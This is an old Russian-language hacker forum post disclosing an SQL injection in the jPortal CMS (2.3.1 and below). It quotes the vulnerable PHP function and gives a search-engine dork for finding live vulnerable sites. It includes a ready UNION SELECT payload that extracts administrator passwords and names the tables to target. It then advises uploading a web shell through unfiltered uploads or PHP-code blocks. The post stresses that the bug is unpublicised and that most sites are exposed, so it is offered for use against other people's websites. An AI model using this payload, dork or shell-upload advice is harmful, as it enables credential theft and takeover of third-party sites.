09.11.2007, 15:43
|
|
Fail
Регистрация: 17.09.2005
Сообщений: 2,242
Провел на форуме:
9089375
Репутация:
4268
|
|
JPoprtal 2.3.1 и ниже SQL иньекция.
Популярная в Польше CMS.
Я не стану описывать все скули что были найдены в этой CMS, некоторые есть и в паблике. Эта уязвимость наиболее "удобна" и нигде не засвечена.
Уязвимо большинство сайтов, все версии. На официальном сайте просто защита от "хакеров", но и он уязвим.
Уязвимый код:
PHP код:
function topic_name($a)
{
global $topic_tbl;
$query = "SELECT * FROM $topic_tbl WHERE id=$a";
$result = mysql_query($query);
$r = mysql_fetch_array($result);
return '<a href="articles.php?topic='.$a.'" class="t_main">'.$r['title'].'</a>';
}
Дорк:intext:"jPORTAL 2" & inurl:"articles.php?topic="
Код:
articles.php?topic=-3+union+select+1,pass,3,4,5+from+admins/
В более старых версиях jp_admins. Также есть таблица users или jp_users.
Шелл заливать двумя способами: Аплоад файлов без фильтра или блоки, позволяющие вставлять php код.
__________________
...
Последний раз редактировалось Alexsize; 09.11.2007 в 15:50..
|
|
|